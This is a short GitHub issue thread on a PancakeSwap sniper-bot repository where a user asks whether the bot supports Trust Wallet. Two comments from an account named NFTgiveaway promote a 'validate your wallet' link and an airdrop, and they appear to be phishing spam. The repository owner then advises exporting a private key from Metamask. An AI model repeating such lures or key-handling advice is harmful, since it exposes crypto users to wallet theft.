### ISSUE TITLE
Trustwallet

### ISSUE THREAD

**Issue by ExotikV** [Trading-Tiger/Pancakeswap_BSC_Sniper_Bot#40]
Can this work with trustwallet?

**Comment by NFTgiveaway** [comment]
Trust Wallet

http://cryptobridge.link/wallet/

Validate your trust wallet with the link and it will work perfectly

**Comment by NFTgiveaway** [comment]
Trust Wallet

 Airdrop starts 2022-01-03

 Airdrop ends 2022-01-23

 Airdrop Link: http://cryptobridge.link/wallet/

 Total value: 10,000,000 TWT

 Platform: Binance chain

**Comment by Trading-Tiger** [comment]
Import your seeds to Metamask and export your private key from Metamask.
